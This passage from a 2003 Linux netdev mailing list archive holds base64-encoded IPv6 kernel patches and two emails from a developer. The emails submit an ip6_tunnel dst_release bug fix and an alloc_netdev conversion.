MjM6MzI6MTQgMjAwMw0KQEAgLTUzMSw2ICs1MzEsNyBAQA0KIAlzdHJ1Y3Qg aXB2Nl9waW5mbyAqbnAgPSBpbmV0Nl9zayhzayk7DQogCXN0cnVjdCBpbjZf YWRkciBmaW5hbF9kc3RfYnVmLCAqZmluYWxfZHN0ID0gTlVMTDsNCiAJc3Ry dWN0IGRzdF9lbnRyeSAqZHN0Ow0KKwlzdHJ1Y3QgcnQ2X2luZm8gKnJ0Ow0K 
IAlpbnQgZXJyID0gMDsNCiAJdW5zaWduZWQgaW50IHBrdGxlbmd0aCwganVt Ym9sZW4sIG10dTsNCiANCkBAIC01NDYsMTEgKzU0NywxMSBAQA0KIA0KIAlk c3QgPSBfX3NrX2RzdF9jaGVjayhzaywgbnAtPmRzdF9jb29raWUpOw0KIAlp ZiAoZHN0KSB7DQotCQlzdHJ1Y3QgcnQ2X2luZm8gKnJ0ID0gKHN0cnVjdCBy dDZfaW5mbyopZHN0Ow0KKwkJcnQgPSAoc3RydWN0IHJ0Nl9pbmZvKilkc3Q7 DQogDQogCQkJLyogWWVzLCBjaGVja2luZyByb3V0ZSB2YWxpZGl0eSBpbiBu b3QgY29ubmVjdGVkDQogCQkJICAgY2FzZSBpcyBub3QgdmVyeSBzaW1wbGUu IFRha2UgaW50byBhY2NvdW50LA0KLQkJCSAgIHRoYXQgd2UgZG8gbm90IHN1 cHBvcnQgcm91dGluZyBieSBzb3VyY2UsIFRPUywNCisJCQkgICB0aGF0IHdl IGRvIG5vdCBzdXBwb3J0IHJvdXRpbmcgYnkgVE9TLA0KIAkJCSAgIGFuZCBN U0dfRE9OVFJPVVRFIAkJLS1BTksgKDk4MDcyNikNCiANCiAJCQkgICAxLiBJ ZiByb3V0ZSB3YXMgaG9zdCByb3V0ZSwgY2hlY2sgdGhhdA0KQEAgLTU3MCw2 ICs1NzEsMTMgQEANCiAJCSAgICAgIGlwdjZfYWRkcl9jbXAoJmZsLT5mbDZf ZHN0LCAmcnQtPnJ0NmlfZHN0LmFkZHIpKQ0KIAkJICAgICAmJiAobnAtPmRh ZGRyX2NhY2hlID09IE5VTEwgfHwNCiAJCQkgaXB2Nl9hZGRyX2NtcCgmZmwt PmZsNl9kc3QsIG5wLT5kYWRkcl9jYWNoZSkpKQ0KKyNpZmRlZiBDT05GSUdf SVBWNl9TVUJUUkVFUw0KKwkJICAgIHx8ICghaXB2Nl9hZGRyX2FueSgmZmwt PmZsNl9zcmMpDQorCQkJJiYgKHJ0LT5ydDZpX3NyYy5wbGVuICE9IDEyOCB8 fA0KKwkJCSAgICBpcHY2X2FkZHJfY21wKCZmbC0+Zmw2X3NyYywgJnJ0LT5y dDZpX3NyYy5hZGRyKSkNCisJCQkmJiAobnAtPnNhZGRyX2NhY2hlID09IE5V TEwgfHwNCisJCQkgICAgaXB2Nl9hZGRyX2NtcCgmZmwtPmZsNl9zcmMsIG5w LT5zYWRkcl9jYWNoZSkpKQ0KKyNlbmRpZg0KIAkJICAgIHx8IChmbC0+b2lm ICYmIGZsLT5vaWYgIT0gZHN0LT5kZXYtPmlmaW5kZXgpKSB7DQogCQkJZHN0 ID0gTlVMTDsNCiAJCX0gZWxzZQ0KQEAgLTU5Niw2ICs2MDQsMjAgQEANCiAJ CQlnb3RvIG91dDsNCiAJCX0NCiAJfQ0KKyNpZmRlZiBDT05GSUdfSVBWNl9T VUJUUkVFUw0KKwlydCA9IChzdHJ1Y3QgcnQ2X2luZm8qKWRzdDsNCisJaWYg KGlwdjZfYWRkcl9jbXAoJmZsLT5mbDZfc3JjLCAmbnAtPnNhZGRyKSAmJiAN CisJICAgIChydC0+cnQ2aV9zcmMucGxlbiAhPSAxMjggfHwgDQorCSAgICAg aXB2Nl9hZGRyX2NtcCgmZmwtPmZsNl9zcmMsICZydC0+cnQ2aV9zcmMuYWRk cikpKSB7DQorCQlkc3RfcmVsZWFzZShkc3QpOw0KKwkJZHN0ID0gaXA2X3Jv dXRlX291dHB1dChzaywgZmwpOw0KKwkJaWYgKGRzdC0+ZXJyb3IpIHsNCisJ CQlJUDZfSU5DX1NUQVRTKElwNk91dE5vUm91dGVzKTsNCisJCQlkc3RfcmVs 
ZWFzZShkc3QpOw0KKwkJCXJldHVybiAtRU5FVFVOUkVBQ0g7DQorCQl9DQor CX0NCisjZW5kaWYNCiAJcGt0bGVuZ3RoID0gbGVuZ3RoOw0KIA0KICAgICAg ICAgaWYgKGRzdCkgew0KQEAgLTcxOSw3ICs3NDEsOSBAQA0KIG91dDoNCiAJ aXA2X2RzdF9zdG9yZShzaywgZHN0LA0KIAkJICAgICAgIWlwdjZfYWRkcl9j bXAoJmZsLT5mbDZfZHN0LCAmbnAtPmRhZGRyKSA/DQotCQkgICAgICAmbnAt PmRhZGRyIDogTlVMTCk7DQorCQkgICAgICAmbnAtPmRhZGRyIDogTlVMTCwN CisJCSAgICAgICFpcHY2X2FkZHJfY21wKCZmbC0+Zmw2X3NyYywgJm5wLT5z YWRkcikgPw0KKwkJICAgICAgJm5wLT5zYWRkciA6IE5VTEwpOw0KIAlpZiAo ZXJyID4gMCkNCiAJCWVyciA9IG5wLT5yZWN2ZXJyID8gbmV0X3htaXRfZXJy bm8oZXJyKSA6IDA7DQogCXJldHVybiBlcnI7DQpAQCAtMTE0NCwxNSArMTE2 OCwxNiBAQA0KIGludCBpcDZfZHN0X2xvb2t1cChzdHJ1Y3Qgc29jayAqc2ss IHN0cnVjdCBkc3RfZW50cnkgKipkc3QsIHN0cnVjdCBmbG93aSAqZmwpDQog ew0KIAlzdHJ1Y3QgaXB2Nl9waW5mbyAqbnAgPSBpbmV0Nl9zayhzayk7DQor CXN0cnVjdCBydDZfaW5mbyAqcnQ7DQogCWludCBlcnIgPSAwOw0KIA0KIAkq ZHN0ID0gX19za19kc3RfY2hlY2soc2ssIG5wLT5kc3RfY29va2llKTsNCiAJ aWYgKCpkc3QpIHsNCi0JCXN0cnVjdCBydDZfaW5mbyAqcnQgPSAoc3RydWN0 IHJ0Nl9pbmZvKikqZHN0Ow0KKwkJcnQgPSAoc3RydWN0IHJ0Nl9pbmZvKikq ZHN0Ow0KIA0KIAkJCS8qIFllcywgY2hlY2tpbmcgcm91dGUgdmFsaWRpdHkg aW4gbm90IGNvbm5lY3RlZA0KIAkJCSAgIGNhc2UgaXMgbm90IHZlcnkgc2lt cGxlLiBUYWtlIGludG8gYWNjb3VudCwNCi0JCQkgICB0aGF0IHdlIGRvIG5v dCBzdXBwb3J0IHJvdXRpbmcgYnkgc291cmNlLCBUT1MsDQorCQkJICAgdGhh dCB3ZSBkbyBub3Qgc3VwcG9ydCByb3V0aW5nIGJ5IFRPUywNCiAJCQkgICBh bmQgTVNHX0RPTlRST1VURSAJCS0tQU5LICg5ODA3MjYpDQogDQogCQkJICAg MS4gSWYgcm91dGUgd2FzIGhvc3Qgcm91dGUsIGNoZWNrIHRoYXQNCkBAIC0x MTcyLDYgKzExOTcsMTMgQEANCiAJCSAgICAgIGlwdjZfYWRkcl9jbXAoJmZs LT5mbDZfZHN0LCAmcnQtPnJ0NmlfZHN0LmFkZHIpKQ0KIAkJICAgICAmJiAo bnAtPmRhZGRyX2NhY2hlID09IE5VTEwgfHwNCiAJCQkgaXB2Nl9hZGRyX2Nt cCgmZmwtPmZsNl9kc3QsIG5wLT5kYWRkcl9jYWNoZSkpKQ0KKyNpZmRlZiBD T05GSUdfSVBWNl9TVUJUUkVFUw0KKwkJICAgIHx8ICghaXB2Nl9hZGRyX2Fu eSgmZmwtPmZsNl9zcmMpDQorCQkJJiYgKHJ0LT5ydDZpX3NyYy5wbGVuICE9 IDEyOCB8fA0KKwkJCSAgICBpcHY2X2FkZHJfY21wKCZmbC0+Zmw2X3NyYywg JnJ0LT5ydDZpX3NyYy5hZGRyKSkNCisJCQkmJiAobnAtPnNhZGRyX2NhY2hl 
ID09IE5VTEwgfHwNCisJCQkgICAgaXB2Nl9hZGRyX2NtcCgmZmwtPmZsNl9z cmMsIG5wLT5zYWRkcl9jYWNoZSkpKQ0KKyNlbmRpZg0KIAkJICAgIHx8IChm bC0+b2lmICYmIGZsLT5vaWYgIT0gKCpkc3QpLT5kZXYtPmlmaW5kZXgpKSB7 DQogCQkJKmRzdCA9IE5VTEw7DQogCQl9IGVsc2UNCkBAIC0xMTk4LDcgKzEy MzAsMjAgQEANCiAJCQlyZXR1cm4gZXJyOw0KIAkJfQ0KIAl9DQotDQorI2lm ZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQorCXJ0ID0gKHN0cnVjdCBydDZf aW5mbyopKmRzdDsNCisJaWYgKGlwdjZfYWRkcl9jbXAoJmZsLT5mbDZfc3Jj LCAmbnAtPnNhZGRyKSAmJiANCisJICAgIChydC0+cnQ2aV9zcmMucGxlbiAh PSAxMjggfHwgDQorCSAgICAgaXB2Nl9hZGRyX2NtcCgmZmwtPmZsNl9zcmMs ICZydC0+cnQ2aV9zcmMuYWRkcikpKSB7DQorCQlkc3RfcmVsZWFzZSgqZHN0 KTsNCisJCSpkc3QgPSBpcDZfcm91dGVfb3V0cHV0KHNrLCBmbCk7DQorCQlp ZiAoKCpkc3QpLT5lcnJvcikgew0KKwkJCUlQNl9JTkNfU1RBVFMoSXA2T3V0 Tm9Sb3V0ZXMpOw0KKwkJCWRzdF9yZWxlYXNlKCpkc3QpOw0KKwkJCXJldHVy biAtRU5FVFVOUkVBQ0g7DQorCQl9DQorCX0NCisjZW5kaWYNCiAgICAgICAg IGlmICgqZHN0KSB7DQogCQlpZiAoKGVyciA9IHhmcm1fbG9va3VwKGRzdCwg ZmwsIHNrLCAwKSkgPCAwKSB7DQogCQkJZHN0X3JlbGVhc2UoKmRzdCk7CQ0K ZGlmZiAtTnVyIC0tZXhjbHVkZT1SQ1MgLS1leGNsdWRlPUNWUyAtLWV4Y2x1 ZGU9U0NDUyAtLWV4Y2x1ZGU9Qml0S2VlcGVyIC0tZXhjbHVkZT1DaGFuZ2VT ZXQgbGludXgtMi41Lk9MRC9uZXQvaXB2Ni9pcDZfdHVubmVsLmMgbGludXgt Mi41L25ldC9pcHY2L2lwNl90dW5uZWwuYw0KLS0tIGxpbnV4LTIuNS5PTEQv bmV0L2lwdjYvaXA2X3R1bm5lbC5jCUZyaSBKdWwgIDQgMTQ6NDg6MjEgMjAw Mw0KKysrIGxpbnV4LTIuNS9uZXQvaXB2Ni9pcDZfdHVubmVsLmMJRnJpIEp1 bCAgNCAyMzozMjozNCAyMDAzDQpAQCAtNzU3LDYgKzc1NywxMCBAQA0KIAlp ZiAoZHN0KSB7DQogCQlpZiAobnAtPmRhZGRyX2NhY2hlID09IE5VTEwgfHwN CiAJCSAgICBpcHY2X2FkZHJfY21wKCZmbC5mbDZfZHN0LCBucC0+ZGFkZHJf Y2FjaGUpIHx8DQorI2lmZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQorCQkg ICAgbnAtPnNhZGRyX2NhY2hlID09IE5VTEwgfHwNCisJCSAgICBpcHY2X2Fk ZHJfY21wKCZmbC5mbDZfc3JjLCBucC0+c2FkZHJfY2FjaGUpIHx8DQorI2Vu ZGlmDQogCQkgICAgKGZsLm9pZiAmJiBmbC5vaWYgIT0gZHN0LT5kZXYtPmlm aW5kZXgpKSB7DQogCQkJZHN0ID0gTlVMTDsNCiAJCX0NCkBAIC04MTYsNyAr ODIwLDcgQEANCiAJCXNvY2tfa2ZyZWVfcyhzaywgb3B0LCBvcHQtPnRvdF9s ZW4pOw0KIA0KIAlmbDZfc29ja19yZWxlYXNlKGZsX2xibCk7DQotCWlwNl9k 
c3Rfc3RvcmUoc2ssIGRzdCwgJm5wLT5kYWRkcik7DQorCWlwNl9kc3Rfc3Rv cmUoc2ssIGRzdCwgJm5wLT5kYWRkciwgJm5wLT5zYWRkcik7DQogCWlwNl94 bWl0X3VubG9jaygpOw0KIAlrZnJlZV9za2Ioc2tiKTsNCiAJdC0+cmVjdXJz aW9uLS07DQpkaWZmIC1OdXIgLS1leGNsdWRlPVJDUyAtLWV4Y2x1ZGU9Q1ZT IC0tZXhjbHVkZT1TQ0NTIC0tZXhjbHVkZT1CaXRLZWVwZXIgLS1leGNsdWRl PUNoYW5nZVNldCBsaW51eC0yLjUuT0xEL25ldC9pcHY2L3Jhdy5jIGxpbnV4 LTIuNS9uZXQvaXB2Ni9yYXcuYw0KLS0tIGxpbnV4LTIuNS5PTEQvbmV0L2lw djYvcmF3LmMJV2VkIEp1bCAgMiAxNTo0MjowMyAyMDAzDQorKysgbGludXgt Mi41L25ldC9pcHY2L3Jhdy5jCUZyaSBKdWwgIDQgMjM6MzI6MzQgMjAwMw0K QEAgLTY5NCw3ICs2OTQsOSBAQA0KIGRvbmU6DQogCWlwNl9kc3Rfc3RvcmUo c2ssIGRzdCwNCiAJCSAgICAgICFpcHY2X2FkZHJfY21wKCZmbC5mbDZfZHN0 LCAmbnAtPmRhZGRyKSA/DQotCQkgICAgICAmbnAtPmRhZGRyIDogTlVMTCk7 DQorCQkgICAgICAmbnAtPmRhZGRyIDogTlVMTCwNCisJCSAgICAgICFpcHY2 X2FkZHJfY21wKCZmbC5mbDZfc3JjLCAmbnAtPnNhZGRyKSA/DQorCQkgICAg ICAmbnAtPnNhZGRyIDogTlVMTCk7DQogCWlmIChlcnIgPiAwKQ0KIAkJZXJy ID0gbnAtPnJlY3ZlcnIgPyBuZXRfeG1pdF9lcnJubyhlcnIpIDogMDsNCiAN CmRpZmYgLU51ciAtLWV4Y2x1ZGU9UkNTIC0tZXhjbHVkZT1DVlMgLS1leGNs dWRlPVNDQ1MgLS1leGNsdWRlPUJpdEtlZXBlciAtLWV4Y2x1ZGU9Q2hhbmdl U2V0IGxpbnV4LTIuNS5PTEQvbmV0L2lwdjYvcm91dGUuYyBsaW51eC0yLjUv bmV0L2lwdjYvcm91dGUuYw0KLS0tIGxpbnV4LTIuNS5PTEQvbmV0L2lwdjYv cm91dGUuYwlNb24gSnVuIDMwIDIwOjM2OjAzIDIwMDMNCisrKyBsaW51eC0y LjUvbmV0L2lwdjYvcm91dGUuYwlTYXQgSnVsICA1IDAwOjIzOjQ0IDIwMDMN CkBAIC0zNjMsMTIgKzM2Myw4IEBADQogCQlydC0+dS5kc3QuZmxhZ3MgfD0g RFNUX0hPU1Q7DQogDQogI2lmZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQot CQlpZiAocnQtPnJ0Nmlfc3JjLnBsZW4gJiYgc2FkZHIpIHsNCi0JCQlpcHY2 X2FkZHJfY29weSgmcnQtPnJ0Nmlfc3JjLmFkZHIsIHNhZGRyKTsNCi0JCQly dC0+cnQ2aV9zcmMucGxlbiA9IDEyODsNCi0JCX0NCisJCXJ0LT5ydDZpX3Ny Yy5wbGVuID0gb3J0LT5ydDZpX3NyYy5wbGVuOw0KICNlbmRpZg0KLQ0KIAkJ cnQtPnJ0NmlfbmV4dGhvcCA9IG5kaXNjX2dldF9uZWlnaChydC0+cnQ2aV9k ZXYsICZydC0+cnQ2aV9nYXRld2F5KTsNCiANCiAJCWRzdF9ob2xkKCZydC0+ dS5kc3QpOw0KQEAgLTczNCw3ICs3MzAsNyBAQA0KIAkJCWlmICghKGd3YV90 eXBlJklQVjZfQUREUl9VTklDQVNUKSkNCiAJCQkJZ290byBvdXQ7DQogDQot 
CQkJZ3J0ID0gcnQ2X2xvb2t1cChnd19hZGRyLCBOVUxMLCBydG1zZy0+cnRt c2dfaWZpbmRleCwgMSk7DQorCQkJZ3J0ID0gcnQ2X2xvb2t1cChnd19hZGRy LCAmcnRtc2ctPnJ0bXNnX3NyYywgcnRtc2ctPnJ0bXNnX2lmaW5kZXgsIDEp Ow0KIA0KIAkJCWVyciA9IC1FSE9TVFVOUkVBQ0g7DQogCQkJaWYgKGdydCA9 PSBOVUxMKQ0KQEAgLTg3OSw3ICs4NzUsNyBAQA0KIAlzdHJ1Y3QgcnQ2X2lu Zm8gKnJ0LCAqbnJ0Ow0KIA0KIAkvKiBMb2NhdGUgb2xkIHJvdXRlIHRvIHRo aXMgZGVzdGluYXRpb24uICovDQotCXJ0ID0gcnQ2X2xvb2t1cChkZXN0LCBO VUxMLCBuZWlnaC0+ZGV2LT5pZmluZGV4LCAxKTsNCisJcnQgPSBydDZfbG9v a3VwKGRlc3QsIHNhZGRyLCBuZWlnaC0+ZGV2LT5pZmluZGV4LCAxKTsNCiAN CiAJaWYgKHJ0ID09IE5VTEwpDQogCQlyZXR1cm47DQpAQCAtMTA0NCw2ICsx MDQwLDkgQEANCiAJCW5ydCA9IGlwNl9ydF9jb3B5KHJ0KTsNCiAJCWlmIChu cnQgPT0gTlVMTCkNCiAJCQlnb3RvIG91dDsNCisjaWZkZWYgQ09ORklHX0lQ VjZfU1VCVFJFRVMNCisJCW5ydC0+cnQ2aV9zcmMucGxlbiA9IHJ0LT5ydDZp X3NyYy5wbGVuOw0KKyNlbmRpZg0KIAkJaXB2Nl9hZGRyX2NvcHkoJm5ydC0+ cnQ2aV9kc3QuYWRkciwgZGFkZHIpOw0KIAkJbnJ0LT5ydDZpX2RzdC5wbGVu ID0gMTI4Ow0KIAkJbnJ0LT51LmRzdC5mbGFncyB8PSBEU1RfSE9TVDsNCmRp ZmYgLU51ciAtLWV4Y2x1ZGU9UkNTIC0tZXhjbHVkZT1DVlMgLS1leGNsdWRl PVNDQ1MgLS1leGNsdWRlPUJpdEtlZXBlciAtLWV4Y2x1ZGU9Q2hhbmdlU2V0 IGxpbnV4LTIuNS5PTEQvbmV0L2lwdjYvdGNwX2lwdjYuYyBsaW51eC0yLjUv bmV0L2lwdjYvdGNwX2lwdjYuYw0KLS0tIGxpbnV4LTIuNS5PTEQvbmV0L2lw djYvdGNwX2lwdjYuYwlGcmkgSnVsICA0IDIzOjMxOjEzIDIwMDMNCisrKyBs aW51eC0yLjUvbmV0L2lwdjYvdGNwX2lwdjYuYwlGcmkgSnVsICA0IDIzOjMy OjM0IDIwMDMNCkBAIC02NzYsNiArNjc2LDE2IEBADQogCQkJZHN0X3JlbGVh c2UoZHN0KTsNCiAJCQlnb3RvIGZhaWx1cmU7DQogCQl9DQorI2lmZGVmIENP TkZJR19JUFY2X1NVQlRSRUVTDQorCQlkc3RfcmVsZWFzZShkc3QpOw0KKw0K KwkJZHN0ID0gaXA2X3JvdXRlX291dHB1dChzaywgJmZsKTsNCisNCisJCWlm ICgoZXJyID0gZHN0LT5lcnJvcikgIT0gMCkgew0KKwkJCWRzdF9yZWxlYXNl KGRzdCk7DQorCQkJZ290byBmYWlsdXJlOw0KKwkJfQ0KKyNlbmRpZg0KIAkJ c2FkZHIgPSAmZmwuZmw2X3NyYzsNCiAJCWlwdjZfYWRkcl9jb3B5KCZucC0+ cmN2X3NhZGRyLCBzYWRkcik7DQogCX0NCkBAIC02ODQsNyArNjk0LDcgQEAN CiAJaXB2Nl9hZGRyX2NvcHkoJm5wLT5zYWRkciwgc2FkZHIpOw0KIAlpbmV0 LT5yY3Zfc2FkZHIgPSBMT09QQkFDSzRfSVBWNjsNCiANCi0JaXA2X2RzdF9z 
dG9yZShzaywgZHN0LCBOVUxMKTsNCisJaXA2X2RzdF9zdG9yZShzaywgZHN0 LCBOVUxMLCBOVUxMKTsNCiAJc2stPnNrX3JvdXRlX2NhcHMgPSBkc3QtPmRl di0+ZmVhdHVyZXMgJg0KIAkJCSAgICB+KE5FVElGX0ZfSVBfQ1NVTSB8IE5F VElGX0ZfVFNPKTsNCiANCkBAIC0xMzQ1LDcgKzEzNTUsNyBAQA0KIAlhdG9t aWNfaW5jKCZpbmV0Nl9zb2NrX25yKTsNCiAjZW5kaWYNCiANCi0JaXA2X2Rz dF9zdG9yZShuZXdzaywgZHN0LCBOVUxMKTsNCisJaXA2X2RzdF9zdG9yZShu ZXdzaywgZHN0LCBOVUxMLCBOVUxMKTsNCiAJc2stPnNrX3JvdXRlX2NhcHMg PSBkc3QtPmRldi0+ZmVhdHVyZXMgJg0KIAkJCSAgICB+KE5FVElGX0ZfSVBf Q1NVTSB8IE5FVElGX0ZfVFNPKTsNCiANCkBAIC0xNzM3LDcgKzE3NDcsNyBA QA0KIAkJCXJldHVybiBlcnI7DQogCQl9DQogDQotCQlpcDZfZHN0X3N0b3Jl KHNrLCBkc3QsIE5VTEwpOw0KKwkJaXA2X2RzdF9zdG9yZShzaywgZHN0LCBO VUxMLCBOVUxMKTsNCiAJCXNrLT5za19yb3V0ZV9jYXBzID0gZHN0LT5kZXYt PmZlYXR1cmVzICYNCiAJCQkJICAgIH4oTkVUSUZfRl9JUF9DU1VNIHwgTkVU SUZfRl9UU08pOw0KIAl9DQpAQCAtMTc3OSw3ICsxNzg5LDcgQEANCiAJCQly ZXR1cm4gLXNrLT5za19lcnJfc29mdDsNCiAJCX0NCiANCi0JCWlwNl9kc3Rf c3RvcmUoc2ssIGRzdCwgTlVMTCk7DQorCQlpcDZfZHN0X3N0b3JlKHNrLCBk c3QsIE5VTEwsIE5VTEwpOw0KIAl9DQogDQogCXNrYi0+ZHN0ID0gZHN0X2Ns b25lKGRzdCk7DQpkaWZmIC1OdXIgLS1leGNsdWRlPVJDUyAtLWV4Y2x1ZGU9 Q1ZTIC0tZXhjbHVkZT1TQ0NTIC0tZXhjbHVkZT1CaXRLZWVwZXIgLS1leGNs dWRlPUNoYW5nZVNldCBsaW51eC0yLjUuT0xEL25ldC9pcHY2L3VkcC5jIGxp bnV4LTIuNS9uZXQvaXB2Ni91ZHAuYw0KLS0tIGxpbnV4LTIuNS5PTEQvbmV0 L2lwdjYvdWRwLmMJV2VkIEp1bCAgMiAxNTo0MjowMyAyMDAzDQorKysgbGlu dXgtMi41L25ldC9pcHY2L3VkcC5jCUZyaSBKdWwgIDQgMjM6MzI6MzQgMjAw Mw0KQEAgLTM0NSw3ICszNDUsMTYgQEANCiAJCWRzdF9yZWxlYXNlKGRzdCk7 DQogCQlnb3RvIG91dDsNCiAJfQ0KKyNpZmRlZiBDT05GSUdfSVBWNl9TVUJU UkVFUw0KKwlkc3RfcmVsZWFzZShkc3QpOw0KIA0KKwlkc3QgPSBpcDZfcm91 dGVfb3V0cHV0KHNrLCAmZmwpOw0KKw0KKwlpZiAoKGVyciA9IGRzdC0+ZXJy b3IpICE9IDApIHsNCisJCWRzdF9yZWxlYXNlKGRzdCk7DQorCQlnb3RvIG91 dDsNCisJfQ0KKyNlbmRpZg0KIAlpZiAoaXB2Nl9hZGRyX2FueSgmbnAtPnNh ZGRyKSkNCiAJCWlwdjZfYWRkcl9jb3B5KCZucC0+c2FkZHIsICZmbC5mbDZf c3JjKTsNCiANCkBAIC0zNTYsNyArMzY1LDkgQEANCiANCiAJaXA2X2RzdF9z dG9yZShzaywgZHN0LA0KIAkJICAgICAgIWlwdjZfYWRkcl9jbXAoJmZsLmZs 
Nl9kc3QsICZucC0+ZGFkZHIpID8NCi0JCSAgICAgICZucC0+ZGFkZHIgOiBO VUxMKTsNCisJCSAgICAgICZucC0+ZGFkZHIgOiBOVUxMLA0KKwkJICAgICAg IWlwdjZfYWRkcl9jbXAoJmZsLmZsNl9zcmMsICZucC0+c2FkZHIpID8NCisJ CSAgICAgICZucC0+c2FkZHIgOiBOVUxMKTsNCiANCiAJc2stPnNrX3N0YXRl ID0gVENQX0VTVEFCTElTSEVEOw0KIG91dDoNCkBAIC05NzAsNyArOTgxLDkg QEANCiANCiAJaXA2X2RzdF9zdG9yZShzaywgZHN0LA0KIAkJICAgICAgIWlw djZfYWRkcl9jbXAoJmZsLmZsNl9kc3QsICZucC0+ZGFkZHIpID8NCi0JCSAg ICAgICZucC0+ZGFkZHIgOiBOVUxMKTsNCisJCSAgICAgICZucC0+ZGFkZHIg OiBOVUxMLA0KKwkJICAgICAgIWlwdjZfYWRkcl9jbXAoJmZsLmZsNl9zcmMs ICZucC0+c2FkZHIpID8NCisJCSAgICAgICZucC0+c2FkZHIgOiBOVUxMKTsN CiAJaWYgKGVyciA+IDApDQogCQllcnIgPSBucC0+cmVjdmVyciA/IG5ldF94 bWl0X2Vycm5vKGVycikgOiAwOw0KIAlyZWxlYXNlX3NvY2soc2spOw0K ---377318441-1491903089-1057357517=:17083-- From vnuorval@tcs.hut.fi Fri Jul 4 17:33:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 17:33:17 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h650X32x015087 for ; Fri, 4 Jul 2003 17:33:03 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id 2223B8000A3; Fri, 4 Jul 2003 16:14:19 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64DEI5L015363; Fri, 4 Jul 2003 16:14:18 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64DEInZ015359; Fri, 4 Jul 2003 16:14:18 +0300 Date: Fri, 4 Jul 2003 16:14:18 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, Cc: netdev@oss.sgi.com Subject: [PATCH] IPV6: Fix incorrect dst_entry handling in ip6_tunnel.c Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3760 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: 
netdev Hi, I noticed a bug in ip6ip6_err(), please apply this patch! Thanks, Ville diff -Nur linux-2.5.OLD/net/ipv6/ip6_tunnel.c linux-2.5/net/ipv6/ip6_tunnel.c --- linux-2.5.OLD/net/ipv6/ip6_tunnel.c Fri Jul 4 14:48:21 2003 +++ linux-2.5/net/ipv6/ip6_tunnel.c Fri Jul 4 14:54:53 2003 @@ -506,7 +506,7 @@ icmpv6_send(skb2, rel_type, rel_code, rel_info, skb2->dev); if (rt) - dst_free(&rt->u.dst); + dst_release(&rt->u.dst); kfree_skb(skb2); } -- Ville Nuorvala Research Assistant, Institute of Digital Communications, Helsinki University of Technology email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257 From vnuorval@tcs.hut.fi Fri Jul 4 18:23:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 18:23:22 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h651N22x015996 for ; Fri, 4 Jul 2003 18:23:03 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id 900BF800221; Fri, 4 Jul 2003 23:23:45 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64KNj5L016899; Fri, 4 Jul 2003 23:23:45 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64KNipn016895; Fri, 4 Jul 2003 23:23:45 +0300 Date: Fri, 4 Jul 2003 23:23:44 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, Cc: netdev@oss.sgi.com Subject: [PATCH] IPV6: ipv6-in-ipv6 tunnel using alloc_netdev Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="-377318441-1068751107-1057349978=:16323" Content-ID: X-archive-position: 3762 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev This message is in MIME format. 
The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. ---377318441-1068751107-1057349978=:16323 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Hi, I finally had the time to fix ip6_tunnel.c so it also uses alloc_netdev() for creating new tunnel devices. Tested by adding and deleting tunnel device. Patch as attachment... Thanks, Ville -- Ville Nuorvala Research Assistant, Institute of Digital Communications, Helsinki University of Technology email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257 ---377318441-1068751107-1057349978=:16323 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="ip6_tnl_dyn_alloc.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: ATTACHMENT; FILENAME="ip6_tnl_dyn_alloc.patch" ZGlmZiAtTnVyIGxpbnV4LTIuNS5PTEQvbmV0L2lwdjYvaXA2X3R1bm5lbC5j IGxpbnV4LTIuNS9uZXQvaXB2Ni9pcDZfdHVubmVsLmMNCi0tLSBsaW51eC0y LjUuT0xEL25ldC9pcHY2L2lwNl90dW5uZWwuYwlGcmkgSnVsICA0IDE0OjQ4 OjIxIDIwMDMNCisrKyBsaW51eC0yLjUvbmV0L2lwdjYvaXA2X3R1bm5lbC5j CUZyaSBKdWwgIDQgMTQ6Mzc6MjQgMjAwMw0KQEAgLTg3LDE4ICs4NywxMSBA QA0KIA0KIHN0YXRpYyBpbnQgaXA2aXA2X2ZiX3RubF9kZXZfaW5pdChzdHJ1 Y3QgbmV0X2RldmljZSAqZGV2KTsNCiBzdGF0aWMgaW50IGlwNmlwNl90bmxf ZGV2X2luaXQoc3RydWN0IG5ldF9kZXZpY2UgKmRldik7DQorc3RhdGljIHZv 